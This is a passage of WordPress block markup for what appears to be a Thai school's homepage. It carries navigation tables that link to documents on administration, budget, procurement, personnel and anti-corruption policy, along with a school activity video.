href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  สถิติการมาเรียน <br>      -  ตรวจสอบผลการเรียน<br>      -  <a href=\"https://www.facebook.com/obec.go.th/?locale=th_TH\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th/\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 